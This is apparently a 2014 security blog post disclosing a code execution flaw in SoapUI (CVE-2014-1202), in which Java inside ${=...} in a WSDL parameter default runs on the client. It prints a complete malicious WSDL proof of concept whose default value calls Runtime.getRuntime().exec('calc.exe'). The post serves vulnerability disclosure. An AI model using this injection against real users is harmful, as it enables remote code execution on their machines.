SoapUI Code Execution Vulnerability - CVE-2014-1202


In this blog post I will discuss a vulnerability I’ve found in the SoapUI product before version 4.6.4 (CVE-2014-1202).

I discovered this vulnerability during a penetration test in which I saw that the SoapUI software allows the clients to execute a Java code on the local machine by putting a Java code inside the following tag:

${=JAVA CODE};

The vulnerability allows the attacker to execute the java code on the victim’s machine, thereby putting in danger the SoapUI users, including developers, penetration testers, etc.

The SoapUI product allows users to open a SOAP / REST project and import  WSDL/WADL files that help the users to communicate with the remote server easily.

WSDL/WADL files are XML-based grammar that define the operations that a web service offers and the format of the request and response messages that the client sends to and receives from the operations.

In WSDL/WADL files, the file owner can determine the default values of some parameters. Thus, an attacker can impersonate a legitimate web service and inject a malicious Java code into a default value of one of the parameters, and spread it to SoapUI clients.

When a SoapUI client will load a malicious WSDL/WADL file to his project in the SoapUI software, and send a request containing the malicious Java code, the SoapUI will execute the malicious Java code on the victim’s computer.

The attack scenario:

  1. An attacker impersonates a regular web service with a malicious WSDL containing the malicious Java code.

  2. The victim creates a new project in the SoapUI and loads the malicious WSDL.

  3. The victim decides to send a request to the remote server, thus, the SoapUI executes the malicious Java code.

  4. The attacker succeeds in executing malicious code in the victim’s machine and will take it over.

A Proof of Concept (PoC) video can be found at the following link:

http://www.youtube.com/watch?v=3lCLE64rsc0

An example of a malicious WSDL file can be found at the following link:

<!--Malicious WSDL File, SoapUI Code Execution Vulnerability CVE-2014-1202, Barak Tawily-->
<wsdl:definitions targetNamespace="http://example.companyInfo"
 xmlns:tns="http://example.companyInfo"
 xmlns:wsdl="http://schemas.xmlsoap.org/wsdl/"
 xmlns:wsdlsoap="http://schemas.xmlsoap.org/wsdl/soap/"
 xmlns:wsdlmime="http://schemas.xmlsoap.org/wsdl/mime/"
 xmlns:xsd="http://www.w3.org/2001/XMLSchema">

 <wsdl:types>
  <xsd:schema elementFormDefault="qualified"
   targetNamespace="http://example.header">

   <xsd:element name="sampleHeader">
    <xsd:complexType>
     <xsd:all>
      <xsd:element name="priority" type="xsd:int"/>
     </xsd:all>
    </xsd:complexType>
   </xsd:element>
  </xsd:schema>


  <xsd:schema elementFormDefault="qualified"
   targetNamespace="http://example.companyInfo">

   <xsd:element name="Payload_Request">
    <xsd:complexType>
     <xsd:all>
      <xsd:element name="Payload" default="${=Runtime.getRuntime().exec('calc.exe')};" type="xsd:string"/>
     </xsd:all>
    </xsd:complexType>
   </xsd:element>

   <xsd:element name="Payload_RequestResult">
    <xsd:complexType>
     <xsd:all>
      <xsd:element name="result" type="xsd:float"/>
     </xsd:all>
    </xsd:complexType>
   </xsd:element>
  </xsd:schema>
  
  
 </wsdl:types>

 <wsdl:message name="Payload_RequestRequest">
   <wsdl:part name="part1" element="tns:Payload_Request"/>
 </wsdl:message>

 <wsdl:message name="Payload_RequestResponse">
  <wsdl:part name="part1" element="tns:Payload_RequestResult"/>
  <wsdl:part name="part2" type="xsd:string"/>
  <wsdl:part name="part3" type="xsd:base64Binary"/>
 </wsdl:message>

 <wsdl:portType name="CompanyInfo">
  <wsdl:operation name="Payload_Request">
   <wsdl:input message="tns:Payload_RequestRequest"
               name="Payload_RequestRequest"/>
   <wsdl:output message="tns:Payload_RequestResponse"
                name="Payload_RequestResponse"/>
  </wsdl:operation>
 </wsdl:portType>

 <wsdl:binding name="Exploit" type="tns:CompanyInfo">
  <wsdlsoap:binding style="document" transport="http://schemas.xmlsoap.org/soap/http"/>

  <wsdl:operation name="Payload_Request">
   <wsdlsoap:operation soapAction=""/>
   <wsdl:input name="Payload_RequestRequest">
    <wsdlsoap:body use="literal"/>
   </wsdl:input>
   <wsdl:output name="Payload_RequestResponse">
    <wsdlsoap:body use="literal"/>
   </wsdl:output>
  </wsdl:operation>
 </wsdl:binding>

 <wsdl:service name="CompanyInfoService">
  <wsdl:port binding="tns:Exploit" name="SOAPPort">
   <wsdlsoap:address location="http://somewhere/services/CompanyInfoService"/>
  </wsdl:port>
 </wsdl:service>

</wsdl:definitions>
Written on January 15, 2014